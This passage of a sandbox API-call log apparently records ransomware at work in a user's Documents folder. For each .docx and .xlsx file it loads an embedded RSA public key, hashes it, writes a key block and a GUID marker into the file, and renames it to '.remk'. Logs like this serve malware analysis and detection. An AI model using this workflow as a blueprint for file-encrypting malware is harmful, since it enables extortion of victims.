flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.855] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12f1a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.855] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.857] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x12f40, lpOverlapped=0x0) returned 1 [0231.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.858] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.859] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.859] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.859] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.860] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.860] GetLastError () returned 0x0 [0231.860] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.860] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.860] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.860] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.860] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.860] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.861] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12f40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.861] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.862] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.862] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.862] CloseHandle (hObject=0x640) returned 1 [0231.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0231.877] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\htMWWgLGJ_E.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\htmwwglgj_e.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\htMWWgLGJ_E.xlsx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\htmwwglgj_e.xlsx.remk")) returned 1 [0231.879] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x247a13d0, ftCreationTime.dwHighDateTime=0x1d5d229, ftLastAccessTime.dwLowDateTime=0x63909990, ftLastAccessTime.dwHighDateTime=0x1d59d90, ftLastWriteTime.dwLowDateTime=0x63909990, ftLastWriteTime.dwHighDateTime=0x1d59d90, nFileSizeHigh=0x0, nFileSizeLow=0x3591, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ijWUr.docx", cAlternateFileName="IJWUR~1.DOC")) returned 1 [0231.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0231.879] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ijWUr.docx") returned=".docx" [0231.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ijWUr.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ijwur.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.879] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=13713) returned 1 [0231.879] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.881] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x356b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.881] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.882] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x3591, lpOverlapped=0x0) returned 1 [0231.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.883] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.884] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.884] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.884] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.884] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.884] GetLastError () returned 0x0 [0231.884] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.884] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.885] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.885] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.885] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.885] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.885] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x3591, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.885] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.885] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.886] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.886] CloseHandle (hObject=0x640) returned 1 [0231.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x37b5b70 [0231.889] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ijWUr.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ijwur.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ijWUr.docx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ijwur.docx.remk")) returned 1 [0231.891] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93870c0, ftCreationTime.dwHighDateTime=0x1d5e760, ftLastAccessTime.dwLowDateTime=0x756a84c0, ftLastAccessTime.dwHighDateTime=0x1d5df15, ftLastWriteTime.dwLowDateTime=0x756a84c0, ftLastWriteTime.dwHighDateTime=0x1d5df15, nFileSizeHigh=0x0, nFileSizeLow=0xf922, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JuCdXLzZPfwzlrM0D9FT.docx", cAlternateFileName="JUCDXL~1.DOC")) returned 1 [0231.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0231.891] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JuCdXLzZPfwzlrM0D9FT.docx") returned=".docx" [0231.891] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JuCdXLzZPfwzlrM0D9FT.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jucdxlzzpfwzlrm0d9ft.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.891] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=63778) returned 1 [0231.891] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.893] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xf8fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.893] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.895] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xf922, lpOverlapped=0x0) returned 1 [0231.896] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.896] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.896] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.896] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.897] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.897] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.897] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.897] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.897] GetLastError () returned 0x0 [0231.897] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.897] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.897] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.897] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.897] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.898] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.898] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xf922, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.898] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.898] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.899] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.899] CloseHandle (hObject=0x640) returned 1 [0231.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e730 [0231.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0231.902] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JuCdXLzZPfwzlrM0D9FT.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jucdxlzzpfwzlrm0d9ft.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JuCdXLzZPfwzlrM0D9FT.docx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jucdxlzzpfwzlrm0d9ft.docx.remk")) returned 1 [0231.904] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66d18ab0, ftCreationTime.dwHighDateTime=0x1d5d94f, ftLastAccessTime.dwLowDateTime=0xae174100, ftLastAccessTime.dwHighDateTime=0x1d5daab, ftLastWriteTime.dwLowDateTime=0xae174100, ftLastWriteTime.dwHighDateTime=0x1d5daab, nFileSizeHigh=0x0, nFileSizeLow=0x775d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ku2O6ZGXRTMM-OBcr5.xlsx", cAlternateFileName="KU2O6Z~1.XLS")) returned 1 [0231.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0231.904] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ku2O6ZGXRTMM-OBcr5.xlsx") returned=".xlsx" [0231.904] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ku2O6ZGXRTMM-OBcr5.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ku2o6zgxrtmm-obcr5.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.905] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=30557) returned 1 [0231.905] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.907] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x7737, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.907] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.909] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.909] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x775d, lpOverlapped=0x0) returned 1 [0231.910] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.910] lstrlenA (lpString="-----BEGIN PUBLIC 